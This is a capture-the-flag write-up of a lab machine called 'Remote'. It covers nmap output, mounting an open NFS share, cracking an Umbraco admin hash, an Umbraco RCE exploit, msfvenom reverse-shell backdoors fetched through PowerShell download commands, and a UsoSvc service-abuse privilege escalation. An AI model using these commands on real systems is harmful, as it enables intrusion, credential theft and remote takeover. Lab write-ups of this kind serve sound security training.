Nmap Result

Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-25 18:02 CEST
Nmap scan report for remote.htb (10.10.10.180)
Host is up (0.061s latency).
Not shown: 65520 closed ports
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 5m12s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-07-25T16:19:27
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 738.36 seconds

Information Gathering

I saw rpc that exposes a nfs service. Let's enumerate that

showmount --exports 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)

Okay, I see that everyone can mount that directory. Let's do that.

sudo mount -t nfs 10.10.10.180:/site_backups /home/jack/htb/remote/site_backups_mount/

Inside of it there are some configuration about the web service that are providing. It's called umbraco. Let's get some hashes

grep -roE "([\" \'{\[\=]){0,1}(([a-f0-9]){128}|([a-f0-9]){96}|([a-f0-9]){64}|([a-f0-9]){40}|([a-f0-9]){32})([\" \'}\]\,]){0,1}" -a ./*

The only one that I found interesting was /App_Data/Umbraco.sdf, basically it contains a compact relational database saved in the SQL Server Compact (SQL CE) format. I saw that this hash is related to the Umbraco's admin credentials. [email protected]

The hash was b8be16afba8c314ad33d812f22a04991b90e2aaa so I used Jack Hash Finder to find the original password.

./jhf b8be16afba8c314ad33d812f22a04991b90e2aaa
b8be16afba8c314ad33d812f22a04991b90e2aaa: baconandcheese

Gaining Access

I saw that the webservice is vulnerabile, so I use this exploit Ubraco-RCE
But first of all, I made two reverse shell using Metasploit using two different port. I'll explain why later.

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.10.14.175 LPORT=9999 -b "\x00" -e x86/shikata_ga_nai -f exe -o ~/htb/remote/backdoor0.exe
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.10.14.175 LPORT=8888 -b "\x00" -e x86/shikata_ga_nai -f exe -o ~/htb/remote/backdoor1.exe

Also, we need to get ready to do the privilege escalation, so we will download PowerUp.ps1

We need to fire up a webserver so we can download the backdoors to the target machine. We can achive this by using python. Get into the folder where the backdoors and the PS1 script is and execute the following command:

python3 -m http.server 8080

Now we're ready to use the exploit.
Open up the reverse shell handler

msfconsole -x "use exploit/multi/handler; set payload windows/shell/reverse_tcp; set LPORT 9999; set LHOST 10.10.14.175; run"

Download the backdoor on the target machine.

python3 exploit.py -u [email protected] -p baconandcheese -i http://remote.htb/ -c powershell.exe -a "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.175:8080/backdoor0.exe', '/Windows/TEMP/backdoor0.exe')"

Execute the backdoor

python3 exploit.py -u [email protected] -p baconandcheese -i http://remote.htb/ -c powershell.exe -a "/Windows/TEMP/backdoor0.exe"

Now we got access to the machine!
We can retreive the flag by entering the following command:

more \Users\Public\user.txt

Privilege Escalation

Now we want to have a PowerShell prompt, since we need to use our PowerUp.ps1 module. After that, we're gonna load the module and execute the function to get all the information we need.
Get the PowerShell prompt:

powershell.exe -nop -exec bypass

Downloading PowerUp.ps1

(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.175:8080/PowerUp.ps1', '/Windows/TEMP/PowerUp.ps1')

Downloading the second backdoor:

(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.175:8080/backdoor1.exe', '/Windows/TEMP/backdoor1.exe')

Now we're ready to try privesc. Execute the following command to activate the PowerUp module and then execute the Invoke-AllChecks:

Import-Module /Windows/TEMP/PowerUp.ps1
Invoke-AllChecks

The module will start to do some checks and eventually, we find a way:

ServiceName   : UsoSvc
Path          : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -ServiceName 'UsoSvc'

Do you remember the second backdoor that we generated? It's time to use it.
We're gonna execute the second with high privileges.

Create a new reverse shell handler:

msfconsole -x "use exploit/multi/handler; set payload windows/shell/reverse_tcp; set LPORT 8888; set LHOST 10.10.14.175; run"

Execute the second backdoor by doing privesc in our current reverse shell:

Invoke-ServiceAbuse -ServiceName 'UsoSvc' /Windows/TEMP/backdoor1.exe

Done! We got Administrator permission on our second reverse shell! That's great.
Now we can read the flag:

more \Users\Administrator\Desktop\root.txt